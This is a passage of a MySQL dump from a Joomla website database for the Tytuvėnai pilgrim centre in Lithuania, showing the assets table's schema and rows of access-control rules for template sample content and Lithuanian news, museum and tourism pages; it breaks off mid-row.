-- MySQL dump 10.13  Distrib 5.7.33, for Linux (x86_64)
--
-- Host: localhost    Database: tytuvenai_eu_new
-- ------------------------------------------------------
-- Server version	5.7.33-0ubuntu0.16.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `xyhmu_assets`
--

DROP TABLE IF EXISTS `xyhmu_assets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_assets` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `parent_id` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set parent.',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `level` int(10) unsigned NOT NULL COMMENT 'The cached level in the nested tree.',
  `name` varchar(50) NOT NULL COMMENT 'The unique name for the asset.\n',
  `title` varchar(100) NOT NULL COMMENT 'The descriptive title for the asset.',
  `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_asset_name` (`name`),
  KEY `idx_lft_rgt` (`lft`,`rgt`),
  KEY `idx_parent_id` (`parent_id`)
) ENGINE=MyISAM AUTO_INCREMENT=490 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_assets`
--

LOCK TABLES `xyhmu_assets` WRITE;
/*!40000 ALTER TABLE `xyhmu_assets` DISABLE KEYS */;
INSERT INTO `xyhmu_assets` VALUES (1,0,1,911,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.login.offline\":{\"6\":1},\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(2,1,1,2,1,'com_admin','com_admin','{}'),(3,1,3,6,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,7,8,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,9,10,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,11,12,1,'com_config','com_config','{}'),(7,1,13,16,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(8,1,17,856,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,857,858,1,'com_cpanel','com_cpanel','{}'),(10,1,859,860,1,'com_installer','com_installer','{\"core.admin\":[],\"core.manage\":{\"7\":0},\"core.delete\":{\"7\":0},\"core.edit.state\":{\"7\":0}}'),(11,1,861,862,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,863,864,1,'com_login','com_login','{}'),(13,1,865,866,1,'com_mailto','com_mailto','{}'),(14,1,867,868,1,'com_massmail','com_massmail','{}'),(15,1,869,870,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1}}'),(16,1,871,872,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,873,874,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,875,876,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,877,880,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(20,1,881,882,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,883,884,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,885,886,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,887,888,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,889,892,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(25,1,893,896,1,'com_weblinks','com_weblinks','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(26,1,897,898,1,'com_wrapper','com_wrapper','{}'),(27,8,18,25,2,'com_content.category.2','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(28,3,4,5,2,'com_banners.category.3','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(29,7,14,15,2,'com_contact.category.4','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(30,19,878,879,2,'com_newsfeeds.category.5','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(31,25,894,895,2,'com_weblinks.category.6','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(32,24,890,891,1,'com_users.category.7','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(33,1,899,900,1,'com_finder','com_finder','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(34,1,901,902,1,'com_joomlaupdate','com_joomlaupdate','{\"core.admin\":[],\"core.manage\":[],\"core.delete\":[],\"core.edit.state\":[]}'),(35,37,179,188,3,'com_content.category.8','Joomla','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(36,35,180,181,4,'com_content.article.1','The Joomla! Community','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(37,8,26,189,2,'com_content.category.9','Sample Data Article','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(38,37,27,178,3,'com_content.category.10','Demo','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(39,38,28,29,4,'com_content.article.2','Module Variations','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(40,38,30,51,4,'com_content.category.11','Shortcode','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(41,40,31,32,5,'com_content.article.3','Accordion','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(42,40,33,34,5,'com_content.article.4','Carousel','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(43,40,35,36,5,'com_content.article.5','Tab','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(44,40,37,38,5,'com_content.article.6','Map','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(45,40,39,40,5,'com_content.article.7','Testimonial ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(46,40,41,42,5,'com_content.article.8','Alert','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(47,40,43,44,5,'com_content.article.9','Button','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(48,40,45,46,5,'com_content.article.10','Icon','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(49,40,47,48,5,'com_content.article.11','Column','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(50,38,52,53,4,'com_content.article.12','Powerfull Features','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(51,38,54,55,4,'com_content.article.13','Article','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(52,38,56,57,4,'com_content.article.14','Typography','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(54,40,49,50,5,'com_content.article.16','Gallery','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(55,38,58,59,4,'com_content.article.17','Video','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(56,38,60,61,4,'com_content.article.18','Module Position','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(57,35,182,183,4,'com_content.article.19','The Joomla Blog','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(58,35,184,185,4,'com_content.article.20','The Joomla overview','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(59,35,186,187,4,'com_content.article.21','The Joomla Help','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(60,38,62,75,4,'com_content.category.12','University News','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(61,60,63,64,5,'com_content.article.22','College of Arts & Sciences','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(62,60,65,66,5,'com_content.article.23','College of Communication','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(63,60,67,68,5,'com_content.article.24','College of Engineering','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(64,60,69,70,5,'com_content.article.25','College of Fine Arts','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(65,60,71,72,5,'com_content.article.26','College of General Studies','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(66,60,73,74,5,'com_content.article.27','College of Health & Rehabilitation Sciences','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(69,1,903,904,1,'com_k2','com_k2','{\"core.admin\":[],\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(70,38,76,77,4,'com_content.article.28','Pages','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(71,38,78,79,4,'com_content.article.29','About Us','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(72,38,80,81,4,'com_content.article.30','Contact Us','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(73,38,82,97,4,'com_content.category.13','Features','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(74,73,83,84,5,'com_content.article.31','Renginių kalendorius','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(75,144,247,248,3,'com_content.article.32','Dviračiai Tytuvėnuose','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(76,144,245,246,3,'com_content.article.33','Paslaugų įkainiai','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(77,73,85,86,5,'com_content.article.34','Education','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(78,73,87,88,5,'com_content.article.35','Research','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(79,73,89,90,5,'com_content.article.36','Community','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(80,73,91,92,5,'com_content.article.37','corporate training','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(81,73,93,94,5,'com_content.article.38','Initiatives','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(82,73,95,96,5,'com_content.article.39','Impact','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(83,38,98,125,4,'com_content.category.14','Portfolio','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(84,83,99,104,5,'com_content.category.15','2010','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(85,83,105,110,5,'com_content.category.16','2011','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(86,83,117,122,5,'com_content.category.17','2012','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(87,83,111,116,5,'com_content.category.18','2013','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(90,84,100,101,6,'com_content.article.42','consectetuer adipiscing','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(92,84,102,103,6,'com_content.article.44','diam nonummy','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(97,85,106,107,6,'com_content.article.49','erat volutpat','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(99,85,108,109,6,'com_content.article.51','enim ad','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(107,86,118,119,6,'com_content.article.59','consequat Duis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(108,86,120,121,6,'com_content.article.60','autem vel','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(109,87,112,113,6,'com_content.article.61','eum iriure','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(113,87,114,115,6,'com_content.article.65','nulla facilisis','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(114,83,123,124,5,'com_content.article.66','University Gallery','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(115,38,126,177,4,'com_content.category.19','Course list','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(116,115,127,128,5,'com_content.article.67','Programming Lnguage','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(117,115,129,130,5,'com_content.article.68','H.R.M.','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(118,115,131,132,5,'com_content.article.69','Business Math','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(119,115,133,134,5,'com_content.article.70','Economics','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(120,115,135,136,5,'com_content.category.20','Introduction To Anthropology','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(121,115,137,138,5,'com_content.category.21','Biophysical Chemistry  ','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(122,115,139,140,5,'com_content.category.22','Biostatistics','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(123,115,141,142,5,'com_content.category.23','Basic Immunology ','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(124,115,143,144,5,'com_content.category.24','Endocrinology ','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(125,115,145,146,5,'com_content.category.25','Laboratory ','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(126,115,147,148,5,'com_content.category.26','Human Physiology ','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(127,115,149,150,5,'com_content.category.27','Plant Biochemistry ','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(128,115,151,152,5,'com_content.category.28','Biochemical Immunology  ','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(129,115,153,154,5,'com_content.category.29','Bioinformatics','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(130,115,155,156,5,'com_content.category.30','Economic principles','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(132,115,157,158,5,'com_content.article.72','Introduction To Anthropology','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(133,115,159,160,5,'com_content.article.73','Biophysical Chemistry','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(134,115,161,162,5,'com_content.article.74','Biostatistics','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(135,115,163,164,5,'com_content.article.75','Basic Immunology','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(136,115,165,166,5,'com_content.article.76','Endocrinology','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(137,27,19,20,3,'com_content.article.77','Laboratory','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(138,115,167,168,5,'com_content.article.78','Human Physiology','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(139,115,169,170,5,'com_content.article.79','Plant Biochemistry','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(140,115,171,172,5,'com_content.article.80','Biochemical Immunology','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(141,115,173,174,5,'com_content.article.81','Bioinformatics','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(142,115,175,176,5,'com_content.article.82','Economic principles','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(143,1,905,906,1,'com_j2xml','com_j2xml','{}'),(144,8,190,263,2,'com_content.category.31','Apie centrą',''),(145,8,264,277,2,'com_content.category.32','Naujienosa','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(146,8,278,289,2,'com_content.category.33','Tytuvėnai',''),(147,8,290,299,2,'com_content.category.34','Piligrimai',''),(148,8,300,307,2,'com_content.category.35','Muziejus',''),(149,8,308,313,2,'com_content.category.36','Galerija',''),(150,8,314,331,2,'com_content.category.37','Vienuolynas',''),(151,8,332,333,2,'com_content.category.38','Turizmas','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(152,8,334,335,2,'com_content.category.39','Tytuvėnų piligrimų centras','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(153,144,191,200,3,'com_content.category.40','The CMS',''),(154,144,201,208,3,'com_content.category.41','Projektai',''),(155,144,209,212,3,'com_content.category.42','Naujienos',''),(156,144,213,230,3,'com_content.category.43','General',''),(157,8,336,749,2,'com_content.category.44','Naujienos','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(158,145,265,276,3,'com_content.category.45','Newsflash',''),(159,146,279,288,3,'com_content.category.46','Apie Tytuvėnus',''),(160,147,291,298,3,'com_content.category.47','Piligrimai',''),(161,148,301,306,3,'com_content.category.48','Muziejus',''),(162,149,309,310,3,'com_content.category.49','Tytuvėnų kraštas',''),(163,149,311,312,3,'com_content.category.50','Muziejus',''),(164,150,315,330,3,'com_content.category.51','Vienuolynas',''),(165,8,768,819,2,'com_content.category.52','Turizmo informacija','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(166,8,750,767,2,'com_content.category.53','Veikla','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(167,153,192,193,4,'com_content.article.83','Joomla! Features',''),(168,153,194,195,4,'com_content.article.84','Joomla! Overview',''),(169,153,196,197,4,'com_content.article.85','Content Layouts',''),(170,153,198,199,4,'com_content.article.86','Extensions',''),(171,154,202,203,4,'com_content.article.87','Tytuvėnų bendruomenės vaidmens saugant ir naudojant kultūros paveldą stiprinimas',''),(172,154,204,205,4,'com_content.article.88','Tytuvėnų bernardinų vienuolyno ansamblio pritaikymas turizmo reikmėms',''),(173,154,206,207,4,'com_content.article.89','Projektas „Tytuvėnų Bernardinų vienuolyno ansamblio pritaikymas turizmo reikmėms“ įgyvendintas',''),(174,155,210,211,4,'com_content.article.90','Pasirašyta bendradarbiavimo sutartis',''),(175,156,214,215,4,'com_content.article.91','Why does Joomla! 1.5 use UTF-8 encoding?',''),(176,156,216,217,4,'com_content.article.92','My MySQL database does not support UTF-8. Do I have a problem?',''),(177,144,241,242,3,'com_content.article.93','Apie centrą','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(178,156,218,219,4,'com_content.article.94','Struktūra ir kontaktai','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(179,156,220,221,4,'com_content.article.95','Viešieji pirkimai','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(180,156,222,223,4,'com_content.article.96','Mažos vertės pirkimai',''),(323,157,465,466,3,'com_content.article.235','Edukacinė programa \"PILIGRIMŲ GIRA\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(184,157,337,338,3,'com_content.article.100','Laukiame naujienų',''),(185,157,339,340,3,'com_content.article.101','Poezijos skaitymai Tytuvėnų kapinėse',''),(186,157,341,342,3,'com_content.article.102','Senjorų vakaronė „Jaunystei prisiminti“',''),(187,157,343,344,3,'com_content.article.103','Advento sekmadieniai Tytuvėnuose',''),(188,157,345,346,3,'com_content.article.104','Nelaimė',''),(189,157,347,348,3,'com_content.article.105','Kviečiame',''),(190,157,349,350,3,'com_content.article.106','Dėkojame už 